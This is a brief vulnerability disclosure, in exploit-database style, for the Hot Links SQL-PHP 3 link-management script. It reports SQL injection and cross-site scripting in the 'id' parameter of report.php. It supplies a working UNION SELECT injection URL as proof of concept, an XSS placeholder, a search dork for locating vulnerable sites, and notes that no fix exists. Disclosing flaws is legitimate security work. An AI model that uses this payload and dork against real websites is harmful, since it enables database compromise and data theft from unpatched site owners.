hotlinks-sqlxss.txt

`###########################################################  
#   
# ___ __ __ __ __   
# /\_ \ /\ \\ \ /\ \/\ \   
# ____\//\ \ \ \ \\ \ __ _ __ _\ \ \ \ \ ____   
# /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\   
# /\__, `\ \_\ \_\ \__ ,__\\> <\\> <\\ \ \_\ \/_/ /_   
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\  
# \/___/ \/____/ \/_/ \//\/_///\/_/ \/_____/\/____/  
#   
# security breakd0wn!  
###########################################################  
#   
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities  
# Vendor: http://www.mrcgiguy.com  
# Vulnerable Version: 3 and prior versions  
# Fix: N/A  
#   
###########################################################  
#   
# c0ntact: sl4x.xuz[at]gmail[dot]com  
# d0rk: "Powered By: Hot Links SQL-PHP 3"  
# stop lammo  
#   
###########################################################  
  
######################  
1. Information  
######################  
Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.  
  
######################  
2. Vulnerabilities  
######################  
SQL Injection in "report.php" in the "id" parameter.  
Cross Site Scripting in "report.php" in the "id" parameter.  
  
######################  
3. PoC  
######################  
http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--  
http://localhost/path/report.php?id=[XSS]  
  
###########################################################  
  
`